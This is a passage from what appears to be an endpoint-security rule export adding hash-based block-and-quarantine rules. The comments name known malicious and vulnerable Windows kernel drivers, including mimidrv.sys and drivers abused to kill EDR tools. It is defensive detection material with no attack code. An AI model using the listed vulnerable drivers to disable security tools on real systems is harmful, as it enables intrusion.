+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976818Z",
+ "creation_date": "2026-03-23T11:45:29.976820Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976826Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7131fedf0462c49e5060d3545f49a74d5f937ad84fc1a747a8a766f61a2958df",
+ "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "14bcf3f3-b464-55fe-9b38-89ba68af65ee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982068Z",
+ "creation_date": "2026-03-23T11:45:29.982070Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982076Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2470fd1b733314c9b0afa19fd39c5d19aa1b36db598b5ebbe93445caa545da5f",
+ "comment": "Vulnerable Kernel Driver (aka rwdrv.sys) [https://www.loldrivers.io/drivers/b03798af-d25a-400b-9236-4643a802846f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "14c1febc-aa56-50a6-b6ec-fc2ef883b207",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.478552Z",
+ "creation_date": "2026-03-23T11:45:31.478556Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.478581Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "415a90c32f8b4651eb5c81cae348549d8792da1b9dac8fbefe0178667b947238",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "14cc30b4-746b-51cf-8a66-6d987602cc2c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835684Z",
+ "creation_date": "2026-03-23T11:45:30.835686Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835691Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b6a14e072636da3560bc7d52ccf9c6c6706666eb7e813b422e88782ca1b4d838",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "14d06643-7993-59f5-b03a-d670d8fc33cf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480168Z",
+ "creation_date": "2026-03-23T11:45:30.480170Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480176Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f82cde6dc693a4ac8b485ac9225f2641141213f8333b0be8d7134d0139f17c26",
+ "comment": "Vulnerable Kernel Driver (aka IoAccesssys.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "14db5509-3e34-5a9f-946a-27d4011c4f58",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617341Z",
+ "creation_date": "2026-03-23T11:45:29.617343Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617348Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "321cc3f24a518c70fb537ee9472b1777d05727c649d5b6538082a971c40ddcbe",
+ "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "14de6487-6f53-50e3-8419-c512e4cb71b0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.478760Z",
+ "creation_date": "2026-03-23T11:45:30.478763Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.478772Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4bef5f5160c6a981562597dda319f9a235c28d5beba5268a454f734500ec1f4f",
+ "comment": "Vulnerable Kernel Driver (aka Tmel.sys) [https://www.loldrivers.io/drivers/1aeb1205-8b02-42b6-a563-b953ea337c19/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "14e9eaeb-27b8-5416-a2db-03d761558401",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144540Z",
+ "creation_date": "2026-03-23T11:45:32.144542Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144548Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0dc9021f0c02e18f4c3357da42630adf515655b9473f93385c5c157efd5da4ac",
+ "comment": "Malicious Kernel Driver (aka driver_4d8bc539.sys) [https://www.loldrivers.io/drivers/e7fd8ffc-ab37-4a7b-8dc9-fc7432fbacae/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "14ffc62a-9a7c-5143-b386-065e7d9c6c70",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614455Z",
+ "creation_date": "2026-03-23T11:45:29.614457Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614462Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "30706f110725199e338e9cc1c940d9a644d19a14f0eb8847712cba4cacda67ab",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "15022bcb-7506-5cc8-bda0-a4d81bb9a593",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826296Z",
+ "creation_date": "2026-03-23T11:45:31.826298Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826304Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "56b53c8e746727dbd14fabc55d09c4ddd9d8f6bf2f2f65870128436eaa2bd921",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "150d01b8-8c88-5a7d-933d-b63fef82cc02",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474033Z",
+ "creation_date": "2026-03-23T11:45:30.474036Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474045Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "506ec3e8b28e52be36b89041bbcd9933b7b79eaf8a53594186813d0f60edebc9",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1537d4e2-7032-5295-b9e9-53219a730d0f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809962Z",
+ "creation_date": "2026-03-23T11:45:31.809965Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809974Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d13637f79117ce08698aecc26dd7e2a84f85d83540d2eda6dda8828ac22ce982",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "153f511e-f15b-59ac-b8ae-9fe3e547d4d3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820564Z",
+ "creation_date": "2026-03-23T11:45:30.820566Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820571Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "489c02d8102fc401010793d7388b59dc944a2e77cf4179424015cd863701b19b",
+ "comment": "Vulnerable Kernel Driver (aka rtport.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "15404f1e-c16d-57be-af6f-256f1536565b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468500Z",
+ "creation_date": "2026-03-23T11:45:30.468503Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468512Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d9c3857d2959a3eff45eefe43d8ed1c23bd6908ae8a9a7e2e4e402bbf3e6d3ec",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "154b9623-2e26-578e-91c6-d3a64f9a7510",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822564Z",
+ "creation_date": "2026-03-23T11:45:30.822566Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822572Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0bfed811a8ae3fa634372f74f0d70de1e0183612e91f56ae034486571b55b88b",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1560ccbf-6109-526c-9d80-d33e25f73f59",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154726Z",
+ "creation_date": "2026-03-23T11:45:31.154727Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154733Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9b43dd0ad0664b038cbb94c4a8282b6f3a0fdd81d311a7960b484895a2846ef1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "15758380-ec92-5f05-b781-df1c2385e8cb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454623Z",
+ "creation_date": "2026-03-23T11:45:30.454626Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454635Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "33bdaf3ab141db0f4c6a2c1f9fb047b4e5c6fa6ddc709d905efdd24c2b43041c",
+ "comment": "Vulnerable Kernel Driver (aka atomicredteamcapcom.sys) [https://www.loldrivers.io/drivers/a02e1801-f6fb-41c3-a782-05fdbed44a3c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1578159f-3d46-5dc7-bf47-556106d9ea36",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622793Z",
+ "creation_date": "2026-03-23T11:45:29.622795Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622800Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "96a5b3cd7c1a6dda5b6f402e6c35ba535270467f56addc7448dbe4aa78428411",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "157ca590-e633-5fda-88e0-59f7ec2227ea",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816065Z",
+ "creation_date": "2026-03-23T11:45:31.816069Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816077Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8df573e666344fc1a1212c60c35cd2ab86b131f887c1d6dba74f452b691ae2d3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "157ea4da-eb7d-59d0-bd12-089b9ed30283",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820337Z",
+ "creation_date": "2026-03-23T11:45:30.820339Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820345Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a29093d4d708185ba8be35709113fb42e402bbfbf2960d3e00fd7c759ef0b94e",
+ "comment": "Vulnerable Kernel Driver (aka rtport.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "15824e4d-a332-5e06-9758-09f2e9990ca6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491469Z",
+ "creation_date": "2026-03-23T11:45:31.491472Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491479Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d367b60a73402c6007a87e274c72e2e7c1a0d8e0f2304550b6a380833e2869c6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1587cc47-cbd4-51de-bdb7-3eb08867d2d5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466298Z",
+ "creation_date": "2026-03-23T11:45:30.466301Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466310Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "082a79311da64b6adc3655e79aa090a9262acaac3b917a363b9571f520a17f6a",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "15981c82-3634-5c99-b303-05e8b96b952c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.469867Z",
+ "creation_date": "2026-03-23T11:45:30.469886Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
